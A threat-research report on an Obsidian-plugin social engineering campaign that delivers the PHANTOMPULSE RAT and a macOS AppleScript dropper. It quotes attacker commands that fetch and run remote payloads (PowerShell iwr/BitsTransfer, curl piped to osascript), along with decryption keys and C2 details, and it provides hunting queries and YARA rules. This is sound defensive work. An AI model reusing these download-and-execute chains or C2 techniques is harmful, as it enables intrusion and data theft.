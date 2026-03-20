A follow-up publication will provide a deeper technical analysis of PHANTOMPULSE itself, covering its injection engines, persistence internals, and C2 protocol in greater detail.

Preamble

Elastic Security Labs has identified a novel social engineering campaign that abuses the popular note-taking application, Obsidian, as an initial access vector. The campaign, which we track as REF6598, targets individuals in the financial and cryptocurrency sectors through elaborate social engineering on LinkedIn and Telegram. The threat actors abuse Obsidian's legitimate community plugin ecosystem, specifically the Shell Commands and Hider plugins, to silently execute code when a victim opens a shared cloud vault.

In the observed intrusion, Elastic Defend detected and blocked the attack at the early stage, preventing the threat actors from achieving their objectives on the victim's machine.

The attack chain is cross-platform, with dedicated execution paths for both Windows and macOS. On Windows, an intermediate loader decrypts and reflectively loads payloads entirely in memory using AES-256-CBC, timer queue callback execution, and multiple anti-analysis techniques. The chain culminates in the deployment of a previously undocumented RAT we are naming PHANTOMPULSE, a heavily AI-generated, full-featured backdoor with blockchain-based C2 resolution, advanced process injection via module stomping. On macOS, the attack deploys an obfuscated AppleScript dropper with a Telegram-based fallback C2 resolution mechanism.

This post will detail the full attack chain, from social engineering through final payload analysis, and provide detection guidance and indicators of compromise.

Key takeaways

PHANTOMPULSE is a novel, AI-assisted Windows RAT featuring blockchain-based C2 resolution via Ethereum transaction data and distinct injection techniques

We identified a weakness in the C2 mechanism that allows for a takeover of the implants by responders

Obsidian was abused for initial access social engineering attack

Cross-platform attack chain targeting both Windows and macOS

The macOS payload uses a multi-stage AppleScript dropper with a Telegram dead-drop for fallback C2 resolution

PHANTOMPULL is a custom in-memory loader that delivers PHANTOMPULSE

Campaign overview

The threat actors operate under the guise of a venture capital firm, initiating contact with targets through LinkedIn. After initial engagement, the conversation moves to a Telegram group where multiple purported partners participate, lending credibility to the interaction. The discussion centers around financial services, specifically cryptocurrency liquidity solutions, creating a plausible business context.

The target is asked to use Obsidian, presented as the firm's "management database", for accessing a shared dashboard. The target is provided credentials to connect to a cloud-hosted vault controlled by the attacker.

This vault is the initial access vector. Once opened in Obsidian, the target is instructed to enable community plugins sync. After that, the trojanized plugins silently execute the attack chain.

Initial access

An Elastic Defend behavior alert triggered on suspicious PowerShell execution with Obsidian as the parent process. This immediately caught our attention. Initially, we suspected an untrusted binary masquerading as Obsidian. However, after inspecting the parent process code signature and hash, it appeared to be the legitimate Obsidian binary.

Pivoting on the process event call stack to determine whether a third-party DLL sideload or unbacked memory region was involved, we confirmed that the process creation originated directly from Obsidian itself.

We then investigated the surrounding files for signs of JavaScript injection via modification of dependency files or malicious .asar file planting. Everything appeared to be a clean, legitimate Obsidian installation with no third-party code. At that point, we decided to install Obsidian ourselves and explore what options an attacker could abuse to achieve command execution.

The first thing that stood out was the ability to log in to an Obsidian-synced vault with an email and password.

Obsidian's vault sync feature allows notes and files to be synchronized across devices and platforms. While reviewing the files of the malicious remote vault under the .obsidian config folder, we found evidence that the Shell Commands community plugin had been installed:

C:\Users\user\Documents\<redacted_vault_name>\.obsidian\plugins\obsidian-shellcommands\data.json

The Shell Commands plugin allows users to execute platform-specific shell commands based on configurable triggers such as Obsidian startup, close, every N seconds, and others.

The contents of data.json confirmed our theory: the configured commands matched exactly what we had observed in the original PowerShell behavior alert.

To validate the full attack chain, we attempted to replicate the behavior end-to-end across two machines, a host and a VM using a paid Obsidian Sync license. On the host, we installed the Shell Commands community plugin with a custom command configured to spawn notepad.exe on startup. On the VM, we logged in to the same Obsidian account and connected to the remote vault.

The synced vault on the VM received the base configuration files ( app.json , appearance.json , core-plugins.json , workspace.json ), but notably the plugins/ directory and community-plugins.json were absent entirely. This is because Obsidian's Sync settings expose two separate toggles "Active community plugin list" and "Installed community plugins" both of which are disabled by default and are local client-side preferences that do not propagate through sync.

As shown below, the plugins and community_plugins manifest are not synced automatically (any file inside the .obsidian directory).

However, once enabled, the Shell Commands plugin immediately triggers execution of attacker-defined commands on vault open:

This means an attacker cannot remotely force the installation or enablement of a community plugin via vault sync alone. The victim must manually enable the community plugin sync on their device before the weaponized plugin configuration pulls down and triggers execution.

In the case we investigated, the attacker provided Obsidian account credentials directly to the victim as part of a social engineering lure, likely instructing them to log in, enable community plugin sync, and connect to the pre-staged vault. Once those steps were completed, the Shell Commands plugin and its data.json configuration synced automatically, and on the next configured trigger, the payload executed without any further interaction.

While this attack requires social engineering to cross the community plugin sync boundary, the technique remains notable: it abuses a legitimate application feature as a persistence and command execution channel, the payload lives entirely within JSON configuration files that are unlikely to trigger traditional AV signatures, and execution is handed off by a signed, trusted Electron application, making parent-process-based detection the critical layer.

Alongside the Shell Commands plugin, the author used Hider (v1.6.1), a UI-cleanup plugin that hides interface elements. With every concealment option enabled, the following is the configuration:

{ "hideStatus": true, "hideTabs": true, "hideScroll": true, "hideSidebarButtons": true, "hideTooltips": true, "hideFileNavButtons": true, }

Windows execution chain

Stage 1

The Shell Commands plugin's Windows command contained two Invoke-Expression calls with Base64-encoded strings that decode to the following:

iwr http://195.3.222[.]251/script1.ps1 -OutFile env:TEMP\tt.ps1 -UseBasicParsing powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "env:TEMP\tt.ps1"

This will download a second-stage PowerShell script from a hardcoded IP address and execute it.

Stage 2

The downloaded PowerShell script ( script1.ps1 ) implements a loader-delivery mechanism with a built-in operator-notification system. The script uses BitsTransfer to download the next-stage binary and reports its progress to the C2.

Import-Module BitsTransfer Start-BitsTransfer -Source 'http://195.3.222[.]251/syncobs.exe?q=%23OBSIDIAN' ` -Destination "$env:TEMP\syncobs.exe"

After the download, the script verifies the file's existence and reports the outcome to the C2 at 195.3.222[.]251/stuk-phase . It appears that the prepended characters ( G , R ) to the Status Message, declaring G REEN or R ED as a status color code. The following is a table of all the status messages:

Status Message Meaning GFILE FOUND ON PC Binary downloaded successfully RDOWNLOAD ERROR Download failed, retrying RFATAL DOWNLOAD ERROR Download failed after retry GLAUNCH SUCCESS Binary executed and child processes detected RLAUNCH FAILED Binary failed to start within the timeout GSESSION CLOSED Execution sequence completed

The tag parameter ( Obsidian ) sent with each status update identifies the campaign or infection vector, suggesting the operators might be running multiple concurrent campaigns.

if ($started) { Invoke-RestMethod -Uri "http://195.3.222[.]251/stuk-phase" -Method Post -Body @{ message = "GLAUNCH SUCCESS"; tag = $tag } } else { Invoke-RestMethod -Uri "http://195.3.222[.]251/stuk-phase" -Method Post -Body @{ message = "RLAUNCH FAILED"; tag = $tag } } Start-Sleep -Seconds 3 Invoke-RestMethod -Uri "http://195.3.222[.]251/stuk-phase" -Method Post -Body @{ message = "GSESSION CLOSED"; tag = $tag }

Loader - PHANTOMPULL

This loader is a 64-bit Windows PE executable that extracts an AES-256-CBC-encrypted PE payload from its own resources, decrypts it, and reflectively loads it into memory. This in-memory payload then downloads the next stage from the domain ( panel.fefea22134[.]net ) over HTTPS.

The third-stage payload (PHANTOMPULSE) is then decrypted and loaded reflectively via DllRegisterServer . This loader, which we are calling PHANTOMPULL, includes runtime API resolution and timer-queue-based execution. This sample includes minor forms of evasion/obfuscation, along with dead code; these techniques are used as an anti-analysis trick to waste the analyst's time investigating the malware.

Execution Flow

Stage 1

Stage 2

Fake Integrity Check

The loader begins with a strange start using a dead-code guard that compares GetTickCount() against the hex value ( 0xFFFFFFFE ) — a value that corresponds to approximately 49.7 days of continuous system uptime, making the condition virtually unreachable. The guarded block contains convincing but unreachable anti-tamper functions designed to waste analysts' time during reverse engineering.

The anti_tamper_integrity_checksum() function is also pretty strange; it doesn’t actually hash any of the underlying bytes, but sums all the function addresses in the binary. The checksum is never compared to anything; this is likely an intended anti-analysis technique to waste analyst time and bloat the binary.

API Hashing

This loader resolves API functions dynamically at runtime using the djb2 hashing algorithm with seed 0x4E67C6A7 . The following APIs were resolved:

VirtualAlloc

VirtualProtect

VirtualFree

LoadLibraryA

GetProcessAddress

Resource Extraction + Decryption

PHANTOMPULL stores its encrypted in-memory payload inside its own resources.

In order to extract the bytes, it uses FindResourceA, locating the resource type ( RT_RCDATA ) under ID ( 101 ). The resource is mapped into memory and copied into a region marked with PAGE_READWRITE permissions.

Next, the loader performs AES-256-CBC decryption using BCryptOpenAlgorithmProvider . The key is hardcoded in the .rdata section

Key: 6a85736b64761a8b2aaeadc1c0087e1897d16cc5a9d49c6a6ea1164233bad206

The IV is also hard-coded on the stack: A6FA4ADFC20E8E6B77E2DD631DC8FF18



After decryption, the loader validates the output is a valid PE by checking the MZ header magic value with a comparison instruction using a hard-coded value ( 0x0C1DF ) that gets XOR’d with ( 0x9B92 ), equaling the PE magic header (0x5a4d). This is an example of some of the lightweight obfuscation efforts that often seem awkward and don't fit in.

Execution

Rather than calling the payload directly (which is easily detected by sandboxes), the loader uses a timer queue callback. The 50ms delay and separate-thread execution can evade various security/sandbox tooling.

Inside the callback is the reflective PE-loading functionality, which is then used to execute the next stage.

This reflective loading function is the core execution component. It copies the PE headers, maps each section into memory, applies base relocations, resolves imports, and sets the final section protections — producing a fully functional, memory-resident PE that never touches disk.

Execution is then transferred to the second stage via an indirect call rbp instruction, where RBP holds the computed entry point address of the reflectively loaded PE.

Second Stage

The second stage is responsible for downloading the remotely hosted payload (PHANTOMPULSE) and for using a similar reflective-loading technique to launch the implant. This stage starts by creating a mutex from an XOR operation with two hard-coded global variables.

The mutex name for this sample is: hVNBUORXNiFLhYYh

After the mutex is created, this code enters a persistent loop that attempts to download the payload from the C2 server. If the download successfully returns a valid buffer, it breaks out and proceeds to the reflective loading stage.

On failure, the code employs an exponential backoff — starting with a 5-second sleep and multiplying by 1.5x on each retry, capping just under 5 minutes. This avoids a fixed beacon interval that would be trivially fingerprinted in network traffic.

The downloader functionality starts by decrypting the C2 and URL.

The C2 and URL are both decrypted using a simple string decryption function using a 16-byte rotating key ( f77c8e40dfc17be5e74d8679d5b35341 ).

Next, the malware builds the HTTPS request, appending the string using the URI /v1/updates/check?build=payloads and setting the User Agent ( Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 ). This loader uses the WinHTTP library to connect to the C2 on port 443 .

The malware takes the buffer from the remote C2 URL and decrypts the payload with a 16-byte XOR key ( dcf5a9b27cbeedb769ccc8635d204af9 )

Below are the first bytes of the XOR-encoded payload:

Below are the first bytes after the XOR takes place:

After the download and XOR operations, PHANTOMPULL parses the payload and reflects the DLL using DLLRegisterServer .

By quickly checking the strings, we can see the main backdoor, PHANTOMPULSE:

RAT - PHANTOMPULSE

PHANTOMPULSE is a sophisticated 64-bit Windows RAT designed for stealth, resilience, and comprehensive remote access. The binary exhibits strong indicators of AI-assisted development: Debug strings throughout the code are abnormally verbose, self-documenting, and follow a structured step-numbering pattern ( [STEP 1] , [STEP 1/3] , [STEP 2/3] )

During our research, we discovered that the C2 infrastructure had a publicly exposed panel branded as “Phantom Panel" , featuring a login page with username, password, and captcha fields. The panel's design and structure suggest it was also AI-generated, consistent with the development patterns observed in the RAT itself.

C2 rotation through blockchain

PHANTOMPULSE implements a decentralized C2 resolution mechanism using public blockchain infrastructure as a dead drop. The malware's primary method for obtaining its C2 URL is by resolving it from on-chain transaction data. A hardcoded C2 URL serves as a fallback if the blockchain resolution fails after repeated attempts.

The malware queries the Etherscan-compatible API ( /api?module=account&action=txlist&address=<wallet>&page=1&offset=1&sort=desc ) on three Blockscout instances:

eth.blockscout[.]com (Ethereum L1)

(Ethereum L1) base.blockscout[.]com (Base L2)

(Base L2) optimism.blockscout[.]com (Optimism L2)

Each request fetches the most recent transaction associated with a hardcoded wallet address ( 0xc117688c530b660e15085bF3A2B664117d8672aA ), which is itself XOR-encrypted in the binary. The malware parses the transaction's input data field from the JSON response, strips the 0x prefix, hex-decodes the raw bytes, and XOR-decrypts the result using the wallet address as the XOR key. If the decrypted output begins with http , it is accepted as the new active C2 URL.

This technique provides the operator with an infrastructure-agnostic rotation capability: publishing a new C2 endpoint requires only submitting a transaction with crafted calldata to the wallet on any of the three monitored chains. Because blockchain transactions are immutable and publicly accessible, the malware can always locate its C2 without relying on centralized infrastructure. The use of three independent chains adds redundancy: even if one chain's explorer is blocked or unavailable, the remaining two provide alternative resolution paths.

However, this design introduces a significant weakness. The Blockscout API returns all transactions involving the wallet address, both sent and received, sorted in reverse chronological order. The malware does not verify the sender of the transaction. This means any third party who knows the wallet address and the XOR key (both recoverable from the binary) can craft a transaction to the wallet containing a competing input payload. Because the malware always selects the most recent transaction, a single inbound transaction with a more recent timestamp would override the operator's intended C2 URL. In practice, this allows anyone to hijack the C2 resolution by submitting a sinkhole URL encoded with the same XOR scheme, effectively redirecting all infected hosts away from the attacker infrastructure.

C2 communication

PHANTOMPULSE uses WinHTTP for C2 communication, dynamically loading winhttp.dll and resolving all required functions at runtime. The C2 infrastructure is built around five API endpoints:

Endpoint Method Purpose /v1/telemetry/report POST Heartbeat with system telemetry /v1/telemetry/tasks/<id> GET Command fetch /v1/telemetry/upload/ POST Screenshot/file upload /v1/telemetry/result POST Command result delivery /v1/telemetry/keylog/ POST Keylog data upload

The heartbeat sends comprehensive system telemetry as JSON, including CPU model, GPU, RAM, OS version, username, privilege level, public IP, installed AV products, installed applications, and the results of the last command execution.

Command table

The command dispatcher parses JSON responses from the C2 to extract and hash commands via the djb2 algorithm. This hash is processed by a switch-case statement to execute the corresponding logic, as seen in the pseudocode below:

Hash Command Action 0x04CF1142 inject Inject shellcode/DLL/EXE into target process 0x7C95D91A drop Drop the file to the disk and execute 0x9A37F083 screenshot Capture and upload a screenshot 0x08DEDEF0 keylog Start/stop keylogger 0x4EE251FF uninstall Full persistence removal and cleanup 0x65CCC50B elevate Escalate to SYSTEM via COM elevation moniker 0xB3B5B880 downgrade SYSTEM -> elevated admin transition 0x20CE3BC8 <unresolved> Resolves APIs, calls ExitProcess(0) self-termination

MacOS execution chain

Stage 1: AppleScript via osascript

The Shell commands plugin's macOS command executes a Base64-encoded payload through osascript .

The decoded payload performs two primary actions:

LaunchAgent persistence: Creates a persistent LaunchAgent plist at ~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist configured with KeepAlive and RunAtLoad set to true , ensuring the second-stage payload executes on every login and restarts if terminated.

Second-stage execution: The LaunchAgent executes a heavily obfuscated AppleScript dropper through /bin/bash -c piped into osascript .

Stage 2: Obfuscated AppleScript dropper

The second-stage payload is an obfuscated AppleScript dropper that employs multiple evasion techniques.

String obfuscation: All sensitive strings (domains, URLs, user-agent values) are constructed at runtime using ASCII character , character id , and string id calls, preventing static string extraction:

property __tOlA5QTO5I : {(string id {48, 120, 54, 54, 54, 46, 105, 110, 102, 111})} -- Decodes to: "0x666.info"

Decoy variables: Numerous unused variables with random names and values are defined to increase entropy and hinder analysis.

Fragmented concatenation: Strings are split across mixed encoding methods, combining literal fragments with character-ID lookups to defeat pattern matching.

C2 resolution with Telegram fallback

The dropper implements a layered C2 resolution strategy:

Primary: Iterates over a hardcoded domain list (including 0x666[.]info ), sending a POST request with body "check" to validate C2 availability Fallback: If the primary domain is unreachable, scrapes a public Telegram channel ( t[.]me/ax03bot ) to extract a backup domain



This Telegram dead-drop technique allows operators to rotate C2 infrastructure, making domain-based blocking insufficient as a sole mitigation.

Payload retrieval

Once a C2 is resolved, the script downloads and pipes a second-stage payload directly into osascript :

curl -s --connect-timeout 5 --max-time 10 --retry 3 --retry-delay 2 -X POST <C2_URL> \ -H "User-Agent: <spoofed Chrome UA>"-d "txid=346272f0582541ae5dd08429bb4dc4ff&bmodule"| osascript

The victim identifier ( txid ) and module selector ( bmodule ) are sent as POST parameters. The response is expected to be another AppleScript payload executed immediately. At the time of analysis, the C2 servers for the macOS chain were offline, preventing the collection of subsequent stages.

Infrastructure analysis

Wallet activity

Examining the on-chain activity for the hardcoded wallet ( 0xc117688c530b660e15085bF3A2B664117d8672aA ) reveals the operator's C2 rotation history. The two most recent transactions are self-transfers (wallet to itself), each encoding a different C2 URL in the transaction input data:

Date (UTC) Decoded C2 URL Feb 19, 2026 12:29:47 https://panel.fefea22134[.]net Feb 12, 2026 22:01:59 https://thoroughly-publisher-troy-clara[.]trycloudflare[.]com

The use of a Cloudflare Tunnel domain ( trycloudflare[.]com ) as a prior C2 endpoint is notable, as it allows the operator to expose a local server through Cloudflare's infrastructure without registering a domain, providing an additional layer of anonymity.

The wallet was initially funded on Feb 12, 2026, at 21:39:47 UTC by a separate account ( 0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E ) with a transfer of $5.84 and an empty input field ( 0x ), confirming this was purely a funding transaction. The funding wallet itself has conducted approximately 50 transactions over the past three months, which provides a potential pivot point for uncovering additional campaigns operated by the same threat actor.

Payload staging server

The initial payload delivery server at 195.3.222[.]251 is hosted on AS 201814 (MEVSPACE sp. z o.o.), a Polish hosting provider.

PhantomPulse C2 panel

The domain fefea22134[.]net resolves to Cloudflare IPs ( 104.21.79[.]142 and 172.67.146[.]15 ), indicating the C2 panel sits behind Cloudflare's proxy. Historical passive DNS shows the domain was first resolved on 2026-03-12, with earlier resolutions pointing to different IPs ( 188.114.97[.]1 and 188.114.96[.]1 ) on 2026-03-20.

The domain uses a Let's Encrypt certificate first observed on 2026-03-12:

Serial : 5130b76e63cd41f11e6b7c2a77f203f72b4

: Thumbprint : 6c0a1da746438d68f6c4ffbf9a10e873f3cf0499

: Validity: 2026-02-19 to 2026-05-20

The certificate issuance date (Feb 19) aligns with the most recent blockchain C2 rotation transaction encoding panel.fefea22134[.]net , suggesting the infrastructure was provisioned the same day the C2 URL was published on-chain.

Conclusion

REF6598 demonstrates how threat actors continue to find creative initial access vectors by abusing trusted applications and employing targeted social engineering. By abusing Obsidian's community plugin ecosystem rather than exploiting a software vulnerability, the attackers bypass traditional security controls entirely, relying on the application's intended functionality to execute arbitrary code.

In the observed intrusion, Elastic Defend detected and blocked the attack chain at the early stage before PHANTOMPULSE could execute, preventing the threat actor from achieving their objectives. The behavioral protections triggered on the anomalous process execution originating from Obsidian, stopping the payload delivery in its tracks.

Organizations in the financial and cryptocurrency sectors should be aware that legitimate productivity tools can be turned into attack vectors. Defenders should monitor for anomalous child process creation from applications like Obsidian and enforce application-level plugin policies where possible. The indicators and detection logic provided in this research can be used to identify and respond to this activity.

Elastic Security Labs will continue to monitor REF6598 for further developments, including additional macOS payloads once the associated C2 infrastructure becomes active.

MITRE ATT&CK

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

Detecting REF6598

Detection

The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:

Prevention

Hunting queries in Elastic

These hunting queries are used to identify the presence of the Obsidian community shell command plugin as well as the resulting command execution :

KQL

event.category : file and process.name : (Obsidian or Obsidian.exe) and file.path : *obsidian-shellcommands*

event.category : process and event.type : start and [process.](http://process.name)n[ame] (http://process.name) : (sh or bash or zsh or powershell.exe or cmd.exe) and process.parent.name : (Obsidian.exe or Obsidian)

YARA

Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the PHANTOMPULL and PHANTOMPULSE

rule Windows_Trojan_PhantomPull { meta: author = "Elastic Security" os = "Windows" category_type = "Trojan" family = "PhantomPull" threat_name = "Windows.Trojan.PhantomPull" reference_sample = "70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980" strings: $GetTickCount = { 48 83 C4 80 FF 15 ?? ?? ?? ?? 83 F8 FE 75 } $djb2 = { 45 8B 0C 83 41 BA A7 C6 67 4E 49 01 C9 45 8A 01 } $mutex = { 48 89 EB 83 E3 ?? 45 8A 2C 1C 45 32 2C 2E 45 0F B6 FD } $str_decrypt = { 39 C2 7E ?? 49 89 C1 41 83 E1 ?? 47 8A 1C 0A 44 32 1C 01 45 88 1C 00 48 FF C0 } $payload_decrypt = { 4C 89 C8 83 E0 0F 41 8A 14 02 43 30 14 0F 49 FF C1 44 39 CB } $url = "/v1/updates/check?build=payloads" ascii fullword condition: 3 of them }

rule Windows_Trojan_PhantomPulse { meta: author = "Elastic Security" os = "Windows" category_type = "Trojan" family = "PhantomPulse" threat_name = "Windows.Trojan.PhantomPulse" reference_sample = "9e3890d43366faec26523edaf91712640056ea2481cdefe2f5dfa6b2b642085d" strings: $a = "[UNINSTALL 2/6] Removing Scheduled Task..." fullword $b = "PhantomInject: host PID=%lu" fullword $c = "inject: shellcode detected -> InjectShellcodePhantom" fullword $d = "inject: shellcode detected, using phantom section hijack" fullword condition: all of them }

Observations

The following observables were discussed in this research.